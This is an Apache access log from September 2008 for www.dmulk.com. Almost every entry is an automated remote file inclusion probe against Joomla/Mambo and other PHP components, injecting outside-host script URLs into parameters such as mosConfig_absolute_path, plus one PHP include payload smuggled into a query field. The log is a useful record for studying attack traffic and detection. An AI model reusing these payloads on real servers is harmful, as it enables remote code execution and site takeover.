211.51.63.60 - - [12/Sep/2008:09:36:12 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.51.63.59 - - [12/Sep/2008:09:36:15 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:37:06 -0700] "GET /logs/access_080623.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:37:06 -0700] "GET /logs/access_080623.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:37:43 -0700] "GET /logs/access_080519.log//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:37:46 -0700] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:37:47 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:37:47 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:37:47 -0700] "GET /logs/access_080830.log/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:37:48 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:37:48 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:09:37:56 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.177.4.42 - - [12/Sep/2008:09:37:57 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.gkvbreda.nl/themes/media/fastid.txt?? HTTP/1.1" 200 89444 "-" "libwww-perl/5.811" "www.dmulk.com"
70.84.109.52 - - [12/Sep/2008:09:38:05 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://vlt.tennisonline.net/nelsonecom/clients/nisc/gallery/platform/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.109.52 - - [12/Sep/2008:09:38:06 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://vlt.tennisonline.net/nelsonecom/clients/nisc/gallery/platform/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:38:08 -0700] "GET /logs/access_080421.log/index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:38:09 -0700] "GET /index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89434 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:38:09 -0700] "GET /logs/index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:38:11 -0700] "GET /logs/access_080514.log/index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
194.79.66.105 - - [12/Sep/2008:09:38:23 -0700] "GET /logs/access_080316.log/index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [12/Sep/2008:09:38:25 -0700] "GET /index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89428 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [12/Sep/2008:09:38:26 -0700] "GET /logs/index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
68.8.232.250 - warboard [12/Sep/2008:09:38:29 -0700] "GET /warboard/index.php?function=show_insert_form&table_name=warboard_main HTTP/1.1" 200 7348 "http://www.dmulk.com/warboard/index.php?table_name=warboard_main&function=search&where_clause=&page=0&order=FileNum&order_type=DESC" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:09:38:42 -0700] "GET /logs/access_080809.log/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:09:38:42 -0700] "GET /errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:09:38:42 -0700] "GET /logs/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:09:38:42 -0700] "GET /logs/access_080315.log/errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:38:46 -0700] "GET /logs/access_080205.log//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:38:47 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:38:47 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:39:04 -0700] "GET /logs/access_080525.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.68.51.152 - - [12/Sep/2008:09:39:04 -0700] "GET /logs/access_080525.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://chebugis.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:39:08 -0700] "GET /logs/access_080419.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:39:09 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 200 3711 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:39:09 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:39:09 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
61.152.144.67 - - [12/Sep/2008:09:39:09 -0700] "GET /logs/access_080401.log//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.bmw-fanclub-dresden.de//components/com_forum/lite/oye.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:39:10 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [12/Sep/2008:09:39:18 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/editor/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [12/Sep/2008:09:39:18 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/editor/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [12/Sep/2008:09:39:18 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/editor/poiid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.75.193.70 - - [12/Sep/2008:09:39:18 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.woonwinkel-zevenaar.nl/editor/poiid.txt???? HTTP/1.1" 200 50 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:39:20 -0700] "GET /logs/access_080512.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:39:31 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
222.237.78.125 - - [12/Sep/2008:09:39:31 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=http://www.dtcc.edu.vn/cache/abbid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:39:42 -0700] "GET /logs/access_080308.log/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:39:42 -0700] "GET /logs/access_080409.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:39:42 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:39:43 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:39:43 -0700] "GET /index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89439 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:39:43 -0700] "GET /logs/index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.20.138.101 - - [12/Sep/2008:09:39:52 -0700] "GET /logs/access_080509.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.appusergroup.org/joomla/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.92 - - [12/Sep/2008:09:39:53 -0700] "GET /errors.php?error=http://www.giannuzzu.altervista.org/images/zoom/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:09:39:56 -0700] "GET /logs/access_080823.log/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:09:39:56 -0700] "GET /!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:09:39:57 -0700] "GET /logs/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.178 - - [12/Sep/2008:09:40:32 -0700] "GET /bikes/dteel/SeaSTOC07/?M=A HTTP/1.0" 200 973 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
85.214.77.120 - - [12/Sep/2008:09:40:42 -0700] "GET /logs/access_080610.log/index.php?option=com_joomlaboard&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.77.120 - - [12/Sep/2008:09:40:43 -0700] "GET /index.php?option=com_joomlaboard&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89433 "-" "libwww-perl/5.803" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:09:40:48 -0700] "GET /logs/access_080623.log/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:09:40:48 -0700] "GET /logs/access_080623.log/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:09:40:49 -0700] "GET /!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:09:40:49 -0700] "GET /!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:09:40:49 -0700] "GET /logs/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:09:40:49 -0700] "GET /logs/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.214.77.120 - - [12/Sep/2008:09:40:51 -0700] "GET /logs/index.php?option=com_joomlaboard&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.81.65.116 - - [12/Sep/2008:09:41:01 -0700] "GET /logs/access_080529.log/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:09:41:21 -0700] "GET /logs/access_080527.log/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
211.255.32.189 - - [12/Sep/2008:09:41:23 -0700] "GET /logs/access_080527.log/!scanhttp://albcode.t35.com/pw.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:41:40 -0700] "GET /logs/access_080606.log/index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:41:41 -0700] "GET /index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89434 "-" "libwww-perl/5.811" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:41:42 -0700] "GET /logs/index.php?option=com_easybook&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:41:45 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:41:45 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:09:41:47 -0700] "GET /logs/access_080313.log/index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:09:41:49 -0700] "GET /index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89403 "-" "libwww-perl/5.79" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:09:41:50 -0700] "GET /logs/index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:09:41:51 -0700] "GET /logs/access_080323.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ideaindustry.us/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:09:41:52 -0700] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ideaindustry.us/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:09:41:52 -0700] "GET //index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ideaindustry.us/idr.txt?? HTTP/1.1" 200 50 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
219.85.63.226 - - [12/Sep/2008:09:42:05 -0700] "GET /logs/access_080215.log//index.php?_REQUEST=&_REQUEST[option]=option,com_comprofiler&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://ideaindustry.us/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:42:14 -0700] "GET /index.php?option=com_galleria&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89418 "-" "libwww-perl/5.811" "www.dmulk.com"
69.65.42.2 - - [12/Sep/2008:09:42:16 -0700] "GET /logs/access_080506.log/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
69.65.42.2 - - [12/Sep/2008:09:42:16 -0700] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
69.65.42.2 - - [12/Sep/2008:09:42:16 -0700] "GET /logs/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
217.160.109.156 - - [12/Sep/2008:09:42:30 -0700] "GET /admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.maisondubailli.org/components/com_zoom/classes/iptc/eid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.109.156 - - [12/Sep/2008:09:42:30 -0700] "GET /logs/access_080506.log/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.maisondubailli.org/components/com_zoom/classes/iptc/eid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.109.156 - - [12/Sep/2008:09:42:30 -0700] "GET /logs/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.maisondubailli.org/components/com_zoom/classes/iptc/eid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.160.109.156 - - [12/Sep/2008:09:42:30 -0700] "GET /logs/access_080424.log/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://www.maisondubailli.org/components/com_zoom/classes/iptc/eid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
194.79.66.105 - - [12/Sep/2008:09:42:44 -0700] "GET /logs/access_080315.log/index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
129.142.67.13 - - [12/Sep/2008:09:42:47 -0700] "GET /index.php?option=com_forum&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.79" "www.dmulk.com"
194.79.66.105 - - [12/Sep/2008:09:42:51 -0700] "GET /index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89444 "-" "libwww-perl/5.805" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:42:52 -0700] "GET /logs/access_080620.log/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:42:52 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
217.199.191.194 - - [12/Sep/2008:09:42:53 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:43:07 -0700] "GET /logs/access_080703.log/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:43:07 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:43:07 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:43:11 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:43:11 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:43:12 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:43:17 -0700] "GET /logs/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:43:17 -0700] "GET /components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.140.178 - - [12/Sep/2008:09:43:23 -0700] "GET /logs/access_080626.log/components/com_colorlab/admin.color.php?mosConfig_live_site=? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
69.65.42.2 - - [12/Sep/2008:09:43:26 -0700] "GET /logs/access_080424.log/admin_modules/admin_module_deldir.inc.php?config[path_src_include]=http://kaioecee.com/chat/chat/localization/spanish/botid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
194.79.66.105 - - [12/Sep/2008:09:43:30 -0700] "GET /logs/index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.66.105 - - [12/Sep/2008:09:43:31 -0700] "GET /index.php?option=com_swmenufree&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89444 "-" "libwww-perl/5.805" "www.dmulk.com"
64.202.123.186 - - [12/Sep/2008:09:43:37 -0700] "GET /index.php?option=com_joomlalib&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 200 89423 "-" "libwww-perl/5.811" "www.dmulk.com"
77.79.245.90 - - [12/Sep/2008:09:43:39 -0700] "GET /logs/access_080605.log/index.php?option=com_joomla-smf&Itemid=&mosConfig_absolute_path=http://hamayu.palloween.net/language/english.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.212.173.42 - - [12/Sep/2008:09:43:39 -0700] "GET /logs/access_080220.log//administrator/components/com_chronocontact/excelwriter/Writer.php?mosConfig_absolute_path=http://www.beschorner86.de/cms//modules/cmd/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
66.249.23.190 - - [12/Sep/2008:09:43:40 -0700] "GET /logs/access_080321.log//?pg=http://egetyn-adag.eravna.ru//wp-content/fgallery_images/image.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
